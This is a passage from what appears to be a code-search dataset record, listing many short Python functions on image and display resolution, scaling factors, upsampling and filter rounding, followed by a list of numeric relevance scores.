viewbox_h)\n if candidate_scales:\n # size of picture is determined by print area\n return min(candidate_scales)\n if any([print_w.value, print_h.value]):\n msg = \"All potential scales would be infinite.\"\n raise ValueError(msg)\n # a print unit was given, but not a print size. Size of picture is determined\n # by interpreting viewbox dimensions as print_width or print_height units\n return print_w.native_unit.value[1]", "def setResolution(self, resolution):\n self._lowLevelSetDeviceResolution(self.ADC_RESOLUTIONS[resolution])", "def calculate_image_scale(source_width, source_height, target_width, target_height):\n if source_width == target_width and source_height == target_height:\n return 1.0\n\n source_ratio = source_width / source_height\n target_ratio = target_width / target_height\n\n if target_ratio < source_ratio:\n scale = target_width / source_width\n else:\n scale = target_height / source_height\n\n return scale", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def set_resolution(self):\n file_name = os.path.basename(self.in_file)\n if '1KM' in file_name:\n self.resolution = 1000\n else:\n raise ValueError(\n 'Cant read this data, please check its resolution: {}'.format(self.in_file))", "def GetNativeResolution(self, transform=None, maximum=None):\n # Get the source projection's units for a 1x1 pixel, assuming square\n # pixels.\n width, height = self.GetPixelDimensions()\n src_pixel_size = min(abs(width), abs(height))\n\n if transform is None:\n dst_pixel_size = src_pixel_size\n dst_ref = self.GetSpatialReference()\n else:\n # Transform these dimensions into the destination projection\n dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0]\n dst_pixel_size = abs(dst_pixel_size)\n dst_ref = transform.dst_ref\n\n # We allow some floating point error between src_pixel_size and\n # dst_pixel_size based on the major circumference so that the error is\n # in the destination units\n error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128\n\n # Find the resolution where the pixels are smaller than dst_pixel_size.\n for resolution in count():\n if maximum is not None and resolution >= maximum:\n return resolution\n\n res_pixel_size = max(\n *dst_ref.GetPixelDimensions(resolution=resolution)\n )\n if (res_pixel_size - dst_pixel_size) <= error:\n return resolution\n\n # Halve error each resolution\n error /= 2", "def get_resolution(self, curvename):\n\n if curvename == 'flank':\n return self.points_flank\n elif curvename == 'fillet':\n return self.points_fillet\n elif curvename == 'tip':\n return self.points_tip\n elif curvename == 'root':\n return self.points_root\n elif curvename == 'shaft':\n return self.points_shaft\n elif curvename == 'width':\n return self.points_width", "def upsample(\n input,\n size=None,\n scale_factor=None,\n mode='nearest',\n align_corners=False,\n):\n return interpolate(input, size, scale_factor, mode, align_corners)", "def span_rbw_ratio(self):\r\n res = self._visa.query(f\"SENSE{self._screen()}:BANDWIDTH:RESOLUTION:RATIO?\")\r\n return 1 / float(res)", "def ratio(self):\n return float(self.max_width) / self.max_height", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def _scale_filters(filters, multiplier, base=8):\n round_half_up = int(int(filters) * multiplier / base + 0.5)\n result = int(round_half_up * base)\n return max(result, base)", "def handle_proportionality_factors(self, scaling_candidates):\n\n 
if not len(scaling_candidates):\n return\n\n scalingsForHierarchicalIndices = [\n self.optimization_parameter_name_to_index[x] for x in\n scaling_candidates]\n order = np.argsort(scalingsForHierarchicalIndices)\n scalingsForHierarchicalIndices = \\\n [scalingsForHierarchicalIndices[i] for i in order]\n scaling_candidates = [scaling_candidates[i] for i in order]\n\n\n self.f.require_dataset(\"/scalingParameterIndices\",\n shape=(len(scalingsForHierarchicalIndices),),\n dtype='<i4',\n data=scalingsForHierarchicalIndices)\n print(Fore.CYAN, \"Number of proportionality factors for \"\n \"hierarchical optimization: %d\"\n % len(scalingsForHierarchicalIndices))\n\n # find usages for the selected parameters\n use = self.get_analytical_parameter_table(scaling_candidates,\n 'observable')\n\n self.f.require_dataset(\"/scalingParametersMapToObservables\",\n shape=(len(use), 3),\n dtype='<i4', data=use)", "def scale(self, factors):\n if isinstance(factors, numbers.Number):\n factors = np.ones(self.dim) * factors;\n self.raw_wires.scale(factors);", "def guess_scaling(name, spectrum):\n spectra = '%s/disp/%s.1d.fits' % (name, zerocount(spectrum))\n skyname = '%s/sky.1d.fits' % name\n spectrafits = pyfits.open(spectra)\n skyfits = pyfits.open(skyname)\n scalings = []\n for line in LINES:\n spec_peak, spec_cont = get_peak_cont(spectrafits, line, 5)\n sky_peak, sky_cont = get_peak_cont(skyfits, line, 5)\n scale = ((spec_peak - spec_cont) / (sky_peak - sky_cont))\n scalings.append(scale)\n return avg(*scalings)", "def process(self, resolutions):\r\n # This is optional behavior\r\n return resolutions", "def round_filters(filters, divisor=depth_divisor):\n filters *= width_coefficient\n new_filters = max(divisor, int(filters + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += divisor\n return int(new_filters)", "def __call__(self, results):\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple([int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n assert 'scale_factor' not in results, 'scale and scale_factor cannot be both set.'\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_cbboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n\n return results", "def scanResolution(self):\n return self._getAttribute(Attribute.scanResolution)", "def change_resolution(self):", "def castSize(self, scale):\n return self.camera.sensorSize * scale", "def getResolution(s) -> int:\n unit = getDurationUnit(s)\n #number of ticks is 1 / unit (if that is an integer)\n ticksPerQuarter = unit.denominator / unit.numerator\n if ticksPerQuarter.is_integer():\n return int(unit.denominator / unit.numerator)\n else:\n print(s.filePath, ' non integer number of ticks per Quarter')\n return 0", "def __call__(self, results):\n\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple(\n [int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n 
assert 'scale_factor' not in results, (\n 'scale and scale_factor cannot be both set.')\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n return results", "def __call__(self, results):\n\n if 'scale' not in results:\n if 'scale_factor' in results:\n img_shape = results['img'].shape[:2]\n scale_factor = results['scale_factor']\n assert isinstance(scale_factor, float)\n results['scale'] = tuple(\n [int(x * scale_factor) for x in img_shape][::-1])\n else:\n self._random_scale(results)\n else:\n if not self.override:\n assert 'scale_factor' not in results, (\n 'scale and scale_factor cannot be both set.')\n else:\n results.pop('scale')\n if 'scale_factor' in results:\n results.pop('scale_factor')\n self._random_scale(results)\n\n self._resize_img(results)\n self._resize_bboxes(results)\n self._resize_masks(results)\n self._resize_seg(results)\n return results", "def Resolution(self):\n\t\treturn self._get_attribute('resolution')", "def upsampling(\n data,\n scale_h,\n scale_w,\n layout=\"NCHW\",\n method=\"nearest_neighbor\",\n align_corners=False,\n output_shape=None,\n):\n base_layout = layout[0:4]\n if base_layout == \"NCHW\":\n if not output_shape: # static case\n scaled_h = data.shape[2] * scale_h\n scaled_w = data.shape[3] * scale_w\n reshape_size = (\n simplify(topi.cast(te.round(scaled_h), data.shape[2].dtype)),\n simplify(topi.cast(te.round(scaled_w), data.shape[3].dtype)),\n )\n else: # dynamic case -- we don't need to scale; already done in shape func\n reshape_size = (\n simplify(topi.cast(te.round(output_shape[2]), output_shape[2].dtype)),\n simplify(topi.cast(te.round(output_shape[3]), output_shape[3].dtype)),\n )\n elif layout == \"NHWC\":\n if not output_shape: # static case\n scaled_h = data.shape[1] * scale_h\n scaled_w = data.shape[2] * scale_w\n reshape_size = (\n simplify(topi.cast(te.round(scaled_h), data.shape[1].dtype)),\n simplify(topi.cast(te.round(scaled_w), data.shape[2].dtype)),\n )\n else: # dynamic case\n reshape_size = (\n simplify(topi.cast(te.round(output_shape[1]), output_shape[1].dtype)),\n simplify(topi.cast(te.round(output_shape[2]), output_shape[2].dtype)),\n )\n\n else:\n raise ValueError(f\"not support this layout {layout} yet\")\n coord_trans = \"align_corners\" if align_corners else \"asymmetric\"\n if method[0:2] == \"bi\":\n method = method[2:]\n return topi.image.resize2d(\n data,\n [0.0] * 4,\n reshape_size,\n layout=layout,\n method=method,\n coordinate_transformation_mode=coord_trans,\n output_shape=output_shape,\n )", "def get_scale_factor(rec, stack):\n \n rec_pixel_size = get_pixel_size_rec(rec)\n stack_pixel_size = get_pixel_size_stack(stack)\n \n return rec_pixel_size / stack_pixel_size", "def determine_thresholds(confidence, resolution=100):\n if isinstance(confidence, list):\n confidence = np.array(confidence)\n confidence = confidence.flatten()\n confidence = confidence[~np.isnan(confidence)]\n confidence.sort()\n\n assert len(confidence) > resolution and resolution > 2\n\n thresholds = np.ones((resolution))\n thresholds[0] = - np.inf\n thresholds[-1] = np.inf\n delta = np.floor(len(confidence) / (resolution - 2))\n idxs = np.linspace(delta, len(confidence)-delta, resolution-2, dtype=np.int32)\n thresholds[1:-1] = confidence[idxs]\n return thresholds", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag 
> 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def _round_sampling_rate(sampling_rate):\n # check if sampling rate is below 5 Hz in that case always round to one\n if sampling_rate < 5:\n\n # set sampling rate to 1\n rounded_sampling_rate = 1\n\n else:\n\n # round to the nearest 10 digit\n rounded_sampling_rate = round(sampling_rate/10) * 10\n\n return rounded_sampling_rate", "def calculate_rf_size(rf_size, downsample):\n h = 61 # 24\" monitor\n d = 10 # 10cm from the right eye\n r = 1080 / downsample # Vertical resolution\n d_px = np.degrees(math.atan2(h / 2, d)) / (r / 2)\n return rf_size * d_px", "def scaling_factor(self):\n bin_scale = self.spabins * self.spebins\n return bin_scale * self.int_time", "def zoom_to_size(self, *p):\n\t\tif self.image is None or self.allocation is None:\n\t\t\treturn\n\t\tif __debug__: print self.allocation.width, self.image.get_width()\n\t\tif __debug__: print self.allocation.width, self.image.get_width(), self.allocation.width/self.image.get_width()\n\t\tz = min(\n\t\t\tself.allocation.width/self.image.get_width(),\n\t\t\tself.allocation.height/self.image.get_height()\n\t\t\t)\n\t\tif __debug__: print \"zoom_to_size\", \"z=\", z\n\t\tself.zoom = z", "def upround(x, base):\n return base * math.ceil(float(x) / base)", "def get_resolution(self):\n return self.__resolution", "def _round_filters(self, filters, width_coefficient, depth_divisor, min_depth):\n\n if not width_coefficient:\n return filters\n\n filters *= width_coefficient\n min_depth = min_depth or depth_divisor\n new_filters = max(\n min_depth,\n int(filters + depth_divisor / 2) // depth_divisor*depth_divisor\n )\n # Make sure that round down does not go down by more than 10%.\n if new_filters < 0.9 * filters:\n new_filters += depth_divisor\n\n return int(new_filters)", "def get_apply_scale(self, applyScaleFactor, scale_quality = 1.0):\n v = self.scale * self.scale_quality * scale_quality\n if applyScaleFactor:\n v *= self.scale_factor\n return v", "def resize(orig, factor, method=\"nearest\"):\r\n method_dict = {'nearest': 0, 'bilinear': 1, 'cubic': 2}\r\n if method.lower() not in method_dict:\r\n raise ValueError(\"Invalid interpolation method. 
Options are: \" + \", \".join(method_dict.keys()))\r\n try:\r\n return zoom(orig, factor, order=method_dict[method.lower()])\r\n except RuntimeError:\r\n # raised by zoom when factor length does not match orig.shape length\r\n raise ValueError(\"Factor sequence length does not match input length\")", "def Rescale(self):\r\n picWidth,picHeight = self.oldSize = self.GetSizeTuple()\r\n bitmap = self.scaled = self.bitmap\r\n if not bitmap: return\r\n imgWidth,imgHeight = bitmap.GetWidth(),bitmap.GetHeight()\r\n if self.scaling == 2 or (self.scaling == 1 and (imgWidth > picWidth or imgHeight > picHeight)):\r\n image = bitmap.ConvertToImage()\r\n factor = min(1.0*picWidth/imgWidth,1.0*picHeight/imgHeight)\r\n newWidth,newHeight = int(factor*imgWidth),int(factor*imgHeight)\r\n self.scaled = image.Scale(newWidth,newHeight).ConvertToBitmap()\r\n #self.scaled = image.Scale(newWidth,newHeight,wx.IMAGE_QUALITY_HIGH ).ConvertToBitmap()\r", "def resolution_init():\n\n defaultResolution = pm.PyNode(\"defaultResolution\")\n task = ftrack.Task(os.environ[\"FTRACK_TASKID\"])\n\n # Adding/Checking ftrack resolution attribute\n resolution_set = False\n if hasattr(defaultResolution, \"ftrackResolutionSet\"):\n attr = pm.Attribute(\"defaultResolution.ftrackResolutionSet\")\n resolution_set = attr.get()\n else:\n pm.addAttr(\n defaultResolution,\n longName=\"ftrackResolutionSet\",\n defaultValue=True,\n attributeType=\"bool\"\n )\n\n if not resolution_set:\n width = task.getParent().get(\"width\")\n defaultResolution.width.set(width)\n pm.warning(\"Changed resolution width to: {0}\".format(width))\n height = task.getParent().get(\"height\")\n defaultResolution.height.set(height)\n pm.warning(\"Changed resolution height to: {0}\".format(height))\n\n # Vray specific resolution\n if pm.objExists(\"vraySettings\"):\n vray_settings = pm.PyNode(\"vraySettings\")\n vray_settings.width.set(width)\n pm.warning(\"Changed vray resolution width to: {0}\".format(width))\n vray_settings.height.set(height)\n pm.warning(\"Changed vray resolution height to: {0}\".format(height))", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def largestResolution(resolutions):\n return resolutions[0]", "def _upsample_conv(self, x, conv):\n return conv(\n F.interpolate(x,\n scale_factor=2,\n mode='bilinear',\n align_corners=False))", "def _apply_resolution(self, Qin, Rin, interpolation):\n Q, dQ = _interpolate_Q(self.Q, self.dQ, interpolation)\n if np.iscomplex(Rin).any():\n R_real = convolve(Qin, Rin.real, Q, dQ, resolution=self.resolution)\n R_imag = convolve(Qin, Rin.imag, Q, dQ, resolution=self.resolution)\n R = R_real + 1j*R_imag\n else:\n R = convolve(Qin, Rin, Q, dQ, resolution=self.resolution)\n return Q, R", "def get_scaling_ratio(img):\n\n healthy_img_area = 4872 * 6496\n input_img_area = img.shape[0] * img.shape[1]\n ratio = input_img_area / healthy_img_area\n return ratio", "def _set_pixel_size(self) -> None:\n # Not Pansharpened images\n if self.band_combi == Sv1BandCombination.PMS:\n # TODO: manage default resolution for PAN band ?\n self.pixel_size = self._ms_res\n # Pansharpened images\n else:\n self.pixel_size = self._pan_res", "def find_suggested_tonemap_scale(session):\n avg_film_luminance = session.GetFilm().GetFilmY()\n return (1.25 / avg_film_luminance * (118 / 255))\n\n # TODO\n # measure this all the time, show a message to the user if\n # abs(old - new) > threshold\n # so the user can set the new value with one click\n\n # imagepipeline = scene.camera.data.luxcore.imagepipeline\n # 
imagepipeline.tonemapper.linear_scale = suggested_linear_scale\n # imagepipeline.tonemapper.use_autolinear = False", "def __init__(self, resolution, normalize=True, eps=1e-6):\n super().__init__()\n self.r = int(resolution)\n self.normalize = normalize\n self.eps = eps", "def Resolution(self, *args):\n return _Adaptor3d.Adaptor3d_Curve_Resolution(self, *args)", "def _get_upsample_layer(self, in_channels=None, out_channels=None):\n if self.expand_strategy == \"upsample\":\n return nn.Upsample(scale_factor=2, mode=\"nearest\")\n elif self.expand_strategy == \"transpose_convolution\":\n return nn.ConvTranspose2d(\n in_channels, out_channels, 3, stride=2, padding=1, output_padding=1\n )\n else:\n raise ValueError(\"Unkown expand strategy\")", "def _calc_fig_size(self, image_height, dpi, y_range, slice_window, fs):\n duration = slice_window / fs\n width_mm = duration * self.MM_IN_SEC\n height_mm = abs(y_range.max - y_range.min) * self.MM_IN_MV\n\n height_inch = image_height / dpi\n width_inch = height_inch * width_mm / height_mm\n\n return (width_inch, height_inch)", "def standardizeRatios( self, ratios ):\n\t\tratios_standardized = ratios.copy()\n\t\tzscore = lambda x: ( x - x.mean() ) / x.std()\n\t\tfor row in ratios.iterrows():\n\t\t\tratios_standardized.loc[ row[0] ] = zscore( row[1] )\n\t\treturn ratios_standardized", "def _scale_param(self, resid_us):\n return((resid_us**2).sum().sum() / self.dof)", "def resolution(self):\n return self._resolution", "def resolution(self, resolution):\n\n self._resolution = resolution", "def get_scaling(self):\n if self.constrain_navigation:\n self.activate_navigation_constrain()\n return self.sx, self.sy", "def resolution(self):\n return next(iter(self.resolutions()), None)", "def testCalculateVNCScreenRatio(self, mock_tk):\n # Get scale-down ratio if screen height is smaller than AVD height.\n mock_tk.return_value = FakeTkinter(height=800, width=1200)\n avd_h = 1920\n avd_w = 1080\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.4)\n\n # Get scale-down ratio if screen width is smaller than AVD width.\n mock_tk.return_value = FakeTkinter(height=800, width=1200)\n avd_h = 900\n avd_w = 1920\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.6)\n\n # Scale ratio = 1 if screen is larger than AVD.\n mock_tk.return_value = FakeTkinter(height=1080, width=1920)\n avd_h = 800\n avd_w = 1280\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 1)\n\n # Get the scale if ratio of width is smaller than the\n # ratio of height.\n mock_tk.return_value = FakeTkinter(height=1200, width=800)\n avd_h = 1920\n avd_w = 1080\n self.assertEqual(utils.CalculateVNCScreenRatio(avd_w, avd_h), 0.6)" ]
[ "0.66777146", "0.5513569", "0.5297719", "0.5258411", "0.51001024", "0.50386363", "0.50341105", "0.50095075", "0.49838406", "0.49593174", "0.48953298", "0.48382708", "0.47824258", "0.4761503", "0.47418657", "0.47418657", "0.47418657", "0.47353554", "0.46934766", "0.46716377", "0.46686354", "0.46632555", "0.464116", "0.46300888", "0.46214852", "0.4617522", "0.46121708", "0.46090895", "0.46079633", "0.459634", "0.4591744", "0.4590737", "0.4590737", "0.4582168", "0.45549777", "0.45530677", "0.45529407", "0.45406085", "0.45286712", "0.45277342", "0.45252836", "0.45016167", "0.45015433", "0.4496983", "0.44873065", "0.4483391", "0.44797924", "0.44791883", "0.4477756", "0.4472525", "0.44724697", "0.44563133", "0.4442905", "0.44342223", "0.44298378", "0.4428681", "0.44277474", "0.44252795", "0.4424534", "0.4420016", "0.44192308", "0.44094476", "0.44036007", "0.44033262", "0.44022742", "0.44022742", "0.43882185", "0.43877232", "0.43824604", "0.4374804", "0.43692845", "0.4360759", "0.43569183", "0.43535465", "0.43473327", "0.43412396", "0.43398592", "0.43371242", "0.43241242", "0.43237358", "0.4322482", "0.43220592", "0.4320956", "0.43131113", "0.43064624", "0.43046552", "0.43039057", "0.4301367", "0.42983094", "0.42953598", "0.42902893", "0.42818382", "0.4281588", "0.42791483", "0.42697376", "0.42689234", "0.4251579", "0.4250367", "0.42499098", "0.42486098" ]
0.7302088
0
Returns (lowerleft, upperright) TMS tile coordinates. The upperright coordinates are excluded from the range, while the lowerleft coordinates are included.
def GetTmsExtents(self, resolution=None, transform=None):
    if resolution is None:
        resolution = self.GetNativeResolution(transform=transform)

    # Get the tile dimensions in map units
    if transform is None:
        spatial_ref = self.GetSpatialReference()
    else:
        spatial_ref = transform.dst_ref
    tile_width, tile_height = spatial_ref.GetTileDimensions(
        resolution=resolution
    )

    # Validate that the native resolution extents are tile-aligned.
    extents = self.GetTiledExtents(transform=transform)
    pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution)
    if not extents.almost_equal(self.GetExtents(transform=transform),
                                delta=min(*pixel_sizes)):
        raise UnalignedInputError('Dataset is not aligned to TMS grid')

    # Correct for origin, because you can't do modular arithmetic on
    # half-tiles.
    left, bottom = spatial_ref.OffsetPoint(*extents.lower_left)
    right, top = spatial_ref.OffsetPoint(*extents.upper_right)

    # Divide by number of tiles
    return Extents(lower_left=XY(int(round(left / tile_width)),
                                 int(round(bottom / tile_height))),
                   upper_right=XY(int(round(right / tile_width)),
                                  int(round(top / tile_height))))
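As a rough illustration of the final step only, here is the tile-index arithmetic with made-up extents and tile dimensions; all numbers are assumptions, and plain tuples stand in for the Extents/XY helpers used above.

# Hypothetical tile size and origin-offset extents, in map units.
tile_width, tile_height = 100.0, 100.0
left, bottom = -400.0, -300.0    # offset lower-left corner
right, top = 200.0, 100.0        # offset upper-right corner

lower_left = (int(round(left / tile_width)), int(round(bottom / tile_height)))
upper_right = (int(round(right / tile_width)), int(round(top / tile_height)))

print(lower_left, upper_right)  # (-4, -3) (2, 1)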
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getupperleft(self):\n return (self.rect.x, self.rect.y)", "def topLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMinY)", "def topRightCorner(self):\n self._updateExtents()\n return (self._mMaxX,self._mMinY)", "def get_tile_location(self):\n if self.rect.x == 0:\n tile_x = 0\n elif self.rect.x % 32 == 0:\n tile_x = (self.rect.x / 32)\n else:\n tile_x = 0\n\n if self.rect.y == 0:\n tile_y = 0\n elif self.rect.y % 32 == 0:\n tile_y = (self.rect.y / 32)\n else:\n tile_y = 0\n\n return [tile_x, tile_y]", "def tile_coordinates(text):\n UL = (text[1]), (text[2]) # Upper Left\n UR = (text[3]), (text[2]) # Upper Right\n LR = (text[3]), (text[4]) # Lower Right\n LL = (text[1]), (text[4]) # Lower Left\n coordinates = (UL, UR, LR, LL)\n return text[0], [tuple(float(x) for x in xs) for xs in coordinates]", "def topleft(self):\n return (self.left, self.top)", "def upper_left(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.left, self.top", "def __getMaxUpperLeftCoordinate(self, entityNodeList):\r\n minX = sys.maxint\r\n minY = sys.maxint\r\n for node in entityNodeList:\r\n if(node.graphObject_.y < minY):\r\n minY = node.graphObject_.y\r\n if(node.graphObject_.x < minX):\r\n minX = node.graphObject_.x \r\n return (minX, minY)", "def get_current_edges(self) -> Tuple[int, int, int, int]:\n top = int(self.tile_rows[0], 2)\n bottom = int(self.tile_rows[-1], 2)\n left = int(''.join([r[0] for r in self.tile_rows]), 2)\n right = int(''.join([r[-1] for r in self.tile_rows]), 2)\n\n return (top, bottom, left, right)", "def get_bounds(self):\n bottom_right = np.asarray([self.coords[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def lower_right(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.right, self.bottom", "def internal_bounds(self) -> tuple[float, float, float, float]:\n xres, yres = self.res\n w, s, e, n = self.bounds\n y0, y1 = (n, s) if yres < 0 else (s, n)\n x0, x1 = (e, w) if xres < 0 else (w, e)\n return x0, y0, x1, y1", "def sw_corner(self):\n return (self.min_lat, self.min_lon)", "def lower_left(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.left, self.bottom", "def get_bounds(self):\n occupied_locations = self.board.keys()\n min_x = min(p[0] for p in occupied_locations)\n max_x = max(p[0] for p in occupied_locations)\n min_y = min(p[1] for p in occupied_locations)\n max_y = max(p[1] for p in occupied_locations)\n return ((min_x, max_x), (min_y, max_y))", "def upleft(self):\n return Coord([self.x - 1, self.y - 1])", "def get_tile(left, up, right, down):\n tile = 0\n if left:\n tile += 1\n if up:\n tile += 2\n if right:\n tile += 4\n if down:\n tile += 8\n return tile", "def extent(self):\n if self.x is not None:\n if self.y is not None:\n if self.z is not None:\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max(),\n self.z.min(), self.z.max())\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max())\n return (self.x.min(), self.x.max())\n\n elif self.r is not None and self.t is not None:\n if self.z is not None:\n return (self.z.min(), self.z.max(),\n self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n return (self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n\n return ()", "def calculate_min_max_tiles(self):", "def getlefttop(self,xnum,ynum):\n left = self.xmargin + xnum*CELLSIZE\n top = self.ymargin + ynum*CELLSIZE\n return (left,top)", "def convertLatLongToPixels(mapImg, 
leftLongitude, rightLongitude, topLatitude, bottomLatitude, latLong):\n latitude = min(max(latLong[0], bottomLatitude), topLatitude)\n longitude = min(max(latLong[1], leftLongitude), rightLongitude)\n\n diffLat = topLatitude - bottomLatitude\n diffLong = rightLongitude - leftLongitude\n\n pixelX = (longitude - leftLongitude)/diffLong*mapImg.size[0]\n pixelX = max(min(pixelX, mapImg.size[0] - 1), 0)\n pixelY = mapImg.size[1] - (latitude - bottomLatitude)/diffLat*mapImg.size[1]\n pixelY = max(min(pixelY, mapImg.size[1] - 1), 0)\n return (pixelX, pixelY)", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def bottomLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMaxY)", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def create_coords(self, xleft, ytop):\n xbox_left = np.int(xleft*self.scale)\n ytop_draw = np.int(ytop*self.scale)\n win_draw = np.int(self.window*self.scale)\n ystart = self.ys[0]\n\n startx, starty = xbox_left, np.int(ytop_draw+ystart)\n endx, endy = np.int(xbox_left+win_draw), np.int(ytop_draw+win_draw+ystart)\n bbox_coord = ((startx, starty), (endx, endy))\n #bbox_coords.append(((startx, starty), (endx, endy)))\n\n startx, starty = ytop_draw+ystart, ytop_draw+win_draw+ystart\n endx, endy = xbox_left, xbox_left+win_draw\n heatmap_coord = ((startx, starty), (endx, endy))\n #heatmap_coords.append(((startx, starty), (endx, endy)))\n return bbox_coord, heatmap_coord", "def _get_tiles_and_coords(\n self, tensor: torch.Tensor\n ) -> Tuple[torch.Tensor, List[List[int]], List[List[List[int]]]]:\n assert tensor.dim() == 4 and tensor.shape[0] == 1\n\n y_coords, y_overlaps = self._calc_tile_coords(\n tensor.shape[2], self._tile_size[0], self._tile_overlap[0]\n )\n x_coords, x_overlaps = self._calc_tile_coords(\n tensor.shape[3], self._tile_size[1], self._tile_overlap[1]\n )\n tile_coords = torch.jit.annotate(List[Tuple[int, int, int, int]], [])\n [\n [\n tile_coords.append(\n (y, y + self._tile_size[0], x, x + self._tile_size[1])\n )\n for x in x_coords\n ]\n for y in y_coords\n ]\n tiles = torch.cat([tensor[..., c[0] : c[1], c[2] : c[3]] for c in tile_coords])\n return tiles, [y_coords, x_coords], [y_overlaps, x_overlaps]", "def midtop(self):\n return (self.centerx, self.top)", "def world_to_grid(mapdata, wp):\n WX = wp.x\n WY = wp.y\n resol = mapdata.info.resolution\n # -0.5 but coordinates to center\n gx = math.floor((WX - mapdata.info.origin.position.x) / resol - 0.5)\n gy = math.floor((WY - mapdata.info.origin.position.y) / resol - 0.5)\n return gx, gy", "def get_grid_position(self, as_int=True):\n if as_int:\n return (\n int(self.x // Constant.TILE_SIZE),\n int(self.y // Constant.TILE_SIZE),\n )\n else:\n return (\n self.x / Constant.TILE_SIZE,\n self.y / Constant.TILE_SIZE,\n )", "def get_grid_position(self):\n tile_size_x = constants.WINDOW_WIDTH / constants.GRID_TILE_LENGTH\n tile_size_y = constants.WINDOW_HEIGHT / 
constants.GRID_TILE_LENGTH\n grid_x = tile_size_x / self.host.x\n grid_y = tile_size_y / self.host.y\n return grid_x, grid_y", "def get_coords(self):\n xTK = int(jeu.coords(self.rectangle)[0]) # Coordonnées TKinter x1 et y1 du rectangle correspondant à la voiture\n yTK = int(jeu.coords(self.rectangle)[1])\n # On divise par la largeur d'une case et on renvoie les valeurs obtenues sous la forme d'un tuple\n X = xTK//100\n Y = yTK//100\n resultat = [X, Y]\n return resultat", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def get_soft_bounds(self):\n if self.bounds is None:\n hl,hu=(None,None)\n else:\n hl,hu=self.bounds\n\n if self._softbounds is None:\n sl,su=(None,None)\n else:\n sl,su=self._softbounds\n\n \n if sl is None: l = hl\n else: l = sl\n\n if su is None: u = hu\n else: u = su\n\n return (l,u)", "def get_bounds(self):\n return ([self.t_min] * self.dim,[self.t_max] * self.dim)", "def relative_position(self) -> Tuple[int, int]:\n return self.position[0] - self.region.rect.x, self.position[1] - self.region.rect.y", "def relative_position(self) -> Tuple[int, int]:\n return self.position[0] - self.region.rect.x, self.position[1] - self.region.rect.y", "def top_left_tile_value(self):\n\t\treturn 1", "def bottom_left_tile_value(self):\n\t\treturn self.expected_cols * (self.expected_rows - 1) + 1", "def getRange(self) -> Tuple[int, int]:\n return self.validator().bottom(), self.validator().top()", "def get_position_coords(cls):\n row = math.floor(cls.position / cls.size)\n col = cls.position - row * cls.size\n return row, col", "def getPosition(self):\n\tleft = self.getLeft()\n\ttop = self.getTop()\n\treturn (left,top)", "def pupil_left_coords(self):\n if self.pupils_located:\n x = self.eye_left.origin[0] + self.eye_left.pupil.x + self.x_add\n y = self.eye_left.origin[1] + self.eye_left.pupil.y + self.y_add\n return (x, y)", "def tile_bbox(self, (z, x, y_tms)):\n topleft = (x * self.tileSize, (y_tms + 1) * self.tileSize)\n bottomright = ((x + 1) * self.tileSize, y_tms * self.tileSize)\n wn = self.unproject_pixels(topleft, z)\n es = self.unproject_pixels(bottomright, z)\n return wn + es", "def extent(self):\n left = self.transform[0]\n right = left + self.transform[1] * self.shape[1]\n top = self.transform[3]\n bottom = top + 